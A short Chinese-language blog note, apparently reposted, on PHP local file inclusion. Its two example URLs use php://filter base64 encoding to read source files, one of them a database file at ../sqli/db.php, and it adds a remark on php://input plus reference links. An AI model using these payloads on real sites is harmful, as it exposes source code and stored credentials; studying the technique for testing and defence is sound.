1. LFI
http://www.example.com/index.php?m
=php://filter/convert.base64-encode/resource=index
http://www.example.com/index.php?m
=php://filter/read=convert.base64-encode/resource=../sqli/db.php
2. php://input可以等效于post数据
使用hackbar插件提交数据
然后使用mitmporxy抓包
参考:http://www.freebuf.com/articles/web/14097.html
https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/
PHP LFI
猜你喜欢
转载自j4s0nh4ck.iteye.com/blog/2153818
今日推荐
周排行